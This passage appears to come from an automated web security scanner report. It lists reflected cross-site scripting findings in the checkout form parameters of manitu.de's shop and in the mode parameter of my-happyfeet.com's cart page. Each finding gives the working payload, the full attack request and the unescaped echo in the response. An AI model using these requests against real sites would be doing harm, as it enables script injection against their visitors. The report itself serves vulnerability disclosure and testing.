Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:25:51 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="account_id" value="6e0c2\"><script>alert(1)</script>e1fa66e6668" style="width:100px;">
...[SNIP]...

5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_birthdate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c905c"><script>alert(1)</script>e53c535973d was submitted in the billc_birthdate parameter. This input was echoed as c905c\"><script>alert(1)</script>e53c535973d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=c905c"><script>alert(1)</script>e53c535973d&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:08 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_birthdate" value="c905c\"><script>alert(1)</script>e53c535973d" style="width:150px;">
...[SNIP]...

5.92. http://www.manitu.de/shop/ [billc_city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2308d"><script>alert(1)</script>11be4decd10 was submitted in the billc_city parameter. This input was echoed as 2308d\"><script>alert(1)</script>11be4decd10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=2308d"><script>alert(1)</script>11be4decd10&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:01 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_city" value="2308d\"><script>alert(1)</script>11be4decd10" style="width:250px;">
...[SNIP]...

5.93. http://www.manitu.de/shop/ [billc_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18208"><script>alert(1)</script>e2e4d6cdcf4 was submitted in the billc_email parameter. This input was echoed as 18208\"><script>alert(1)</script>e2e4d6cdcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=18208"><script>alert(1)</script>e2e4d6cdcf4&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:57 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17045

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_email" value="18208\"><script>alert(1)</script>e2e4d6cdcf4" style="width:300px;">
...[SNIP]...

5.94. http://www.manitu.de/shop/ [billc_fax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_fax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ea4f"><script>alert(1)</script>4612d8d6ccd was submitted in the billc_fax parameter. This input was echoed as 1ea4f\"><script>alert(1)</script>4612d8d6ccd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=1ea4f"><script>alert(1)</script>4612d8d6ccd&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:44 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_fax" value="1ea4f\"><script>alert(1)</script>4612d8d6ccd" style="width:180px;">
...[SNIP]...

5.95. http://www.manitu.de/shop/ [billc_firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_firstname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6099"><script>alert(1)</script>2ec26a9320f was submitted in the billc_firstname parameter. This input was echoed as a6099\"><script>alert(1)</script>2ec26a9320f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=a6099"><script>alert(1)</script>2ec26a9320f&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:43 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16977

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_firstname" value="a6099\"><script>alert(1)</script>2ec26a9320f" style="width:150px;">
...[SNIP]...

5.96. http://www.manitu.de/shop/ [billc_lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_lastname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc427"><script>alert(1)</script>88472088dee was submitted in the billc_lastname parameter. This input was echoed as cc427\"><script>alert(1)</script>88472088dee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=cc427"><script>alert(1)</script>88472088dee&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:55 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16976

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_lastname" value="cc427\"><script>alert(1)</script>88472088dee" style="width:150px;">
...[SNIP]...

5.97. http://www.manitu.de/shop/ [billc_organization parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_organization request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90c4"><script>alert(1)</script>4c422d990fd was submitted in the billc_organization parameter. This input was echoed as e90c4\"><script>alert(1)</script>4c422d990fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=e90c4"><script>alert(1)</script>4c422d990fd&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:04 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_organization" value="e90c4\"><script>alert(1)</script>4c422d990fd" style="width:300px;">
...[SNIP]...

5.98. http://www.manitu.de/shop/ [billc_phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb713"><script>alert(1)</script>9025fab3457 was submitted in the billc_phone parameter. This input was echoed as eb713\"><script>alert(1)</script>9025fab3457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=eb713"><script>alert(1)</script>9025fab3457&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:30 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16971

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_phone" value="eb713\"><script>alert(1)</script>9025fab3457" style="width:180px;">
...[SNIP]...

5.99. http://www.manitu.de/shop/ [billc_street1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7112b"><script>alert(1)</script>9eef17d54b4 was submitted in the billc_street1 parameter. This input was echoed as 7112b\"><script>alert(1)</script>9eef17d54b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=7112b"><script>alert(1)</script>9eef17d54b4&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:22 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street1" value="7112b\"><script>alert(1)</script>9eef17d54b4" style="width:300px;">
...[SNIP]...

5.100. http://www.manitu.de/shop/ [billc_street2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf1b"><script>alert(1)</script>a77f499cb1c was submitted in the billc_street2 parameter. This input was echoed as 8bf1b\"><script>alert(1)</script>a77f499cb1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=8bf1b"><script>alert(1)</script>a77f499cb1c&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:35 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street2" value="8bf1b\"><script>alert(1)</script>a77f499cb1c" style="width:300px;">
...[SNIP]...

5.101. http://www.manitu.de/shop/ [billc_title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4023"><script>alert(1)</script>7e7e69e7b9f was submitted in the billc_title parameter. This input was echoed as b4023\"><script>alert(1)</script>7e7e69e7b9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=b4023"><script>alert(1)</script>7e7e69e7b9f&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:29 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_title" value="b4023\"><script>alert(1)</script>7e7e69e7b9f" style="width:100px;">
...[SNIP]...

5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_zipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f9a2"><script>alert(1)</script>9f71fef3960 was submitted in the billc_zipcode parameter. This input was echoed as 3f9a2\"><script>alert(1)</script>9f71fef3960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=3f9a2"><script>alert(1)</script>9f71fef3960&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:48 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_zipcode" value="3f9a2\"><script>alert(1)</script>9f71fef3960" size="5" style="width:50px;">
...[SNIP]...

5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabd5</script><script>alert(1)</script>7b31a895f05 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 23932
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
